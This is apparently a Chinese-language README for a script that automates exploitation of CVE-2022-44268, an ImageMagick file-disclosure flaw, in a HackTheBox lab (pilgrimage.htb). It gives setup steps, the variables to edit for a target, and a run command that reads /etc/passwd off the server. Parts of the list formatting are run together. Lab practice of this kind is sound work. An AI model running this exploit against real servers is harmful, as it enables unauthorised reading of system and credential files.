此脚本自动化了 CVE-2022-44268(ImageMagick 文件泄露)的利用过程。
image.png)。exiftool 提取并打印外带的文件内容。requests 库:pip install requestshttps://git.rotfl.io/v/CVE-2022-44268.git 克隆cargo build 构建exiftool 命令行工具wget 命令行工具git clone https://git.rotfl.io/v/CVE-2022-44268.gitcd CVE-2022-44268cargo buildautomate_exploit.py)放置在 CVE-2022-44268 目录内部。您必须针对目标环境编辑 Python 脚本(automate_exploit.py)。需要修改的关键变量:
payload:由 Rust PoC 生成的恶意 image.png 的路径。
"/home/kali/usr/htb/pilgrimage/CVE-2022-44268/image.png""image.png"(因为脚本在创建 image.png 的目录中运行)。url:用于图像上传的目标 URL。
"http://pilgrimage.htb""http://vulnerable-site.com/upload")。proxies(可选):用于路由流量(例如通过 Burp Suite)。
{'http': 'http://127.0.0.1:8080'}None。Host 标头(位于 headers 字典内):应与 url 中的主机名匹配。
'Host': 'pilgrimage.htb'确保您位于 CVE-2022-44268 目录中(automate_exploit.py 和 Rust PoC 均在其中)。
运行脚本,将要外带的目标文件路径作为参数传入:
python3 automate_exploit.py "/etc/passwd"